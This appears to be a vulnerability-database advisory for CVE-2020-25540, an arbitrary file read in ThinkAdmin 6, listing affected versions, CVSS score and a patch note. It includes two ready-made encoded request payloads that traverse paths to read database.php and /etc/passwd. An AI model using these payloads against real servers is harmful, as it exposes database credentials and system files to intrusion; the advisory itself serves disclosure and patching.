vendor:
ThinkAdmin
by:
Hzllaga
7.5
CVSS
HIGH
Arbitrary File Read
22
CWE
Product Name: ThinkAdmin
Affected Version From: v6
Affected Version To: 2020.08.03.01
Patch Exists: YES
Related CWE: CVE-2020-25540
CPE: a:zoujingli:thinkadmin:6
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: PHP7.4.7,Apache
2020
ThinkAdmin 6 – Arbitrarily File Read
ThinkAdmin 6 is vulnerable to an arbitrary file read vulnerability. An attacker can send a specially crafted request to the vulnerable application to read any file on the server. On Windows, the payload to read the database.php file is '/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34' and on Linux, the payload to read the /etc/passwd file is '/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s2p382p2q2p372t0y342w34'.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should update to the latest version of ThinkAdmin 6.